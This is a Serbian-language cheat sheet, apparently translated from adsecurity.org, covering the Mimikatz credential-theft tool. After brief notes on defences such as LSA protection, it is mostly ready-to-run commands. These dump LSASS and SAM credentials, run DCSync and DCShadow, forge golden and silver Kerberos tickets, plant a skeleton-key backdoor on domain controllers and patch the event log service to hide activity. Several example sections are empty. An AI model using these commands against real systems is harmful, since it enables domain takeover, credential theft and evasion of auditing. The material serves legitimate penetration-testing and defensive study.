Mimikatz
Ova stranica se zasniva na jednoj sa adsecurity.org. Proverite original za dodatne informacije!
LM i Plain-Text u memoriji
Od Windows 8.1 i Windows Server 2012 R2 nadalje, značajne mere su implementirane za zaštitu od krađe kredencijala:
LM hešovi i plain-text lozinke više se ne čuvaju u memoriji radi poboljšanja bezbednosti. Specifična registri postavka, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" mora biti konfigurisana sa DWORD vrednošću
0
da bi se onemogućila Digest Authentication, osiguravajući da "plain-text" lozinke nisu keširane u LSASS.LSA zaštita je uvedena da zaštiti proces Lokalnog sigurnosnog autoriteta (LSA) od neovlašćenog čitanja memorije i injekcije koda. To se postiže označavanjem LSASS-a kao zaštićenog procesa. Aktivacija LSA zaštite uključuje:
Modifikovanje registra na HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa postavljanjem
RunAsPPL
nadword:00000001
.Implementaciju objekta grupne politike (GPO) koji sprovodi ovu promenu registra na upravljanim uređajima.
Uprkos ovim zaštitama, alati poput Mimikatz mogu zaobići LSA zaštitu koristeći specifične drajvere, iako su takve radnje verovatno zabeležene u dnevnicima događaja.
Suprotstavljanje uklanjanju SeDebugPrivilege
Administratori obično imaju SeDebugPrivilege, što im omogućava da debaguju programe. Ova privilegija može biti ograničena da se spreče neovlašćeni dumpovi memorije, što je uobičajena tehnika koju napadači koriste za vađenje kredencijala iz memorije. Međutim, čak i sa ovom privilegijom uklonjenom, TrustedInstaller nalog može i dalje vršiti dumpove memorije koristeći prilagođenu konfiguraciju servisa:
Ovo omogućava iskopavanje memorije lsass.exe
u datoteku, koja se zatim može analizirati na drugom sistemu kako bi se izvukle kredencijale:
Mimikatz Opcije
Manipulacija dnevnikom događaja u Mimikatz-u uključuje dve osnovne radnje: brisanje dnevnika događaja i patch-ovanje Event servisa kako bi se sprečilo beleženje novih događaja. Ispod su komande za izvođenje ovih radnji:
Brisanje Dnevnika Događaja
Komanda: Ova radnja je usmerena na brisanje dnevnika događaja, čineći teže praćenje zlonamernih aktivnosti.
Mimikatz ne pruža direktnu komandu u svojoj standardnoj dokumentaciji za brisanje dnevnika događaja direktno putem komandne linije. Međutim, manipulacija dnevnikom događaja obično uključuje korišćenje sistemskih alata ili skripti van Mimikatz-a za brisanje specifičnih dnevnika (npr. korišćenjem PowerShell-a ili Windows Event Viewer-a).
Eksperimentalna Funkcija: Patch-ovanje Event Servisa
Komanda:
event::drop
Ova eksperimentalna komanda je dizajnirana da modifikuje ponašanje Event Logging Servisa, efikasno sprečavajući ga da beleži nove događaje.
Primer:
mimikatz "privilege::debug" "event::drop" exit
Komanda
privilege::debug
osigurava da Mimikatz radi sa potrebnim privilegijama za modifikaciju sistemskih servisa.Komanda
event::drop
zatim patch-uje Event Logging servis.
Kerberos Napadi na Tikete
Kreiranje Zlatnog Tiketa
Zlatni tiket omogućava pristup na nivou domena putem impersonacije. Ključna komanda i parametri:
Komanda:
kerberos::golden
Parametri:
/domain
: Ime domena./sid
: Sigurnosni identifikator (SID) domena./user
: Korisničko ime za impersonaciju./krbtgt
: NTLM hash naloga KDC servisa domena./ptt
: Direktno injektuje tiket u memoriju./ticket
: Čuva tiket za kasniju upotrebu.
Primer:
Silver Ticket Creation
Silver Tickets omogućavaju pristup specifičnim uslugama. Ključna komanda i parametri:
Komanda: Slična Golden Ticket, ali cilja specifične usluge.
Parametri:
/service
: Usluga koja se cilja (npr., cifs, http).Ostali parametri slični Golden Ticket.
Primer:
Trust Ticket Creation
Trust Tickets se koriste za pristup resursima širom domena koristeći odnose poverenja. Ključna komanda i parametri:
Komanda: Slična Zlatnoj Kartici, ali za odnose poverenja.
Parametri:
/target
: FQDN ciljnog domena./rc4
: NTLM hash za račun poverenja.
Primer:
Dodatne Kerberos Komande
Listing Tickets:
Komanda:
kerberos::list
Prikazuje sve Kerberos karte za trenutnu korisničku sesiju.
Pass the Cache:
Komanda:
kerberos::ptc
Umeće Kerberos karte iz fajlova keša.
Primer:
mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Pass the Ticket:
Komanda:
kerberos::ptt
Omogućava korišćenje Kerberos karte u drugoj sesiji.
Primer:
mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Purge Tickets:
Komanda:
kerberos::purge
Briše sve Kerberos karte iz sesije.
Korisno pre korišćenja komandi za manipulaciju kartama kako bi se izbegli konflikti.
Manipulacija Aktivnim Direktorijumom
DCShadow: Privremeno čini mašinu da se ponaša kao DC za manipulaciju AD objektima.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Oponaša DC da zatraži podatke o lozinkama.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
Pristup Akreditivima
LSADUMP::LSA: Ekstrahuje akreditive iz LSA.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Oponaša DC koristeći podatke o lozinkama računa računara.
Nema specifične komande za NetSync u originalnom kontekstu.
LSADUMP::SAM: Pristup lokalnoj SAM bazi podataka.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Dekriptuje tajne smeštene u registru.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Postavlja novu NTLM heš vrednost za korisnika.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: Preuzima informacije o poverenju.
mimikatz "lsadump::trust" exit
Razno
MISC::Skeleton: Umeće backdoor u LSASS na DC-u.
mimikatz "privilege::debug" "misc::skeleton" exit
Eskalacija Privilegija
PRIVILEGE::Backup: Stiče prava za pravljenje rezervnih kopija.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Dobija privilegije za debagovanje.
mimikatz "privilege::debug" exit
Dumpovanje Akreditiva
SEKURLSA::LogonPasswords: Prikazuje akreditive za prijavljene korisnike.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Ekstrahuje Kerberos karte iz memorije.
mimikatz "sekurlsa::tickets /export" exit
Manipulacija Sid-om i Tokenima
SID::add/modify: Menja SID i SIDHistory.
Dodaj:
mimikatz "sid::add /user:targetUser /sid:newSid" exit
Izmeni: Nema specifične komande za izmenu u originalnom kontekstu.
TOKEN::Elevate: Oponaša tokene.
mimikatz "token::elevate /domainadmin" exit
Terminalne Usluge
TS::MultiRDP: Omogućava više RDP sesija.
mimikatz "ts::multirdp" exit
TS::Sessions: Prikazuje TS/RDP sesije.
Nema specifične komande za TS::Sessions u originalnom kontekstu.
Trezor
Ekstrahuje lozinke iz Windows Trezora.
mimikatz "vault::cred /patch" exit
Last updated